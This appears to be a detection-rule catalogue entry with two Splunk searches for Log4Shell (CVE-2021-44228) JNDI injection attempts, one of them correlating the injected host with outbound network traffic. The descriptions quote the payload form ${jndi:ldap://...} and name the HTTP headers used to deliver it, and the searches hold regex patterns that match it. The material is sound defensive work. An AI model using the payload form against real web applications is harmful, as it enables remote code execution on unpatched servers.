LoFP / if there is a vulnerablility scannner looking for log4shells this will trigger, otherwise likely to have low false positives.

Techniques

• T1133
• T1190

Sample rules

Log4Shell JNDI Payload Injection Attempt

• source: splunk
• technicques:
  • T1190
  • T1133

Description

CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to ${jndi:ldap://PAYLOAD_INJECTED}, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the | from datamodel function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for ${jndi:ldap:// pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.

Detection logic

| from datamodel Web.Web 
| regex _raw="[jJnNdDiI]{4}(\:
|\%3A
|\/
|\%2F)\w+(\:\/\/
|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" 
| fillnull 
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user 
| `log4shell_jndi_payload_injection_attempt_filter`

Log4Shell JNDI Payload Injection with Outbound Connection

• source: splunk
• technicques:
  • T1190
  • T1133

Description

CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to ${jndi:ldap://PAYLOAD_INJECTED}, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious ip address.

Detection logic

| from datamodel Web.Web 
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:
|\%3A
|\/
|\%2F)(?<proto>\w+)(\:\/\/
|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<affected_host>[a-zA-Z0-9\.\-\_\$]+)" 
| join affected_host type=inner [
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest 
| `drop_dm_object_name(All_Traffic)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| rename dest AS affected_host] 
| fillnull 
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user 
| `log4shell_jndi_payload_injection_with_outbound_connection_filter`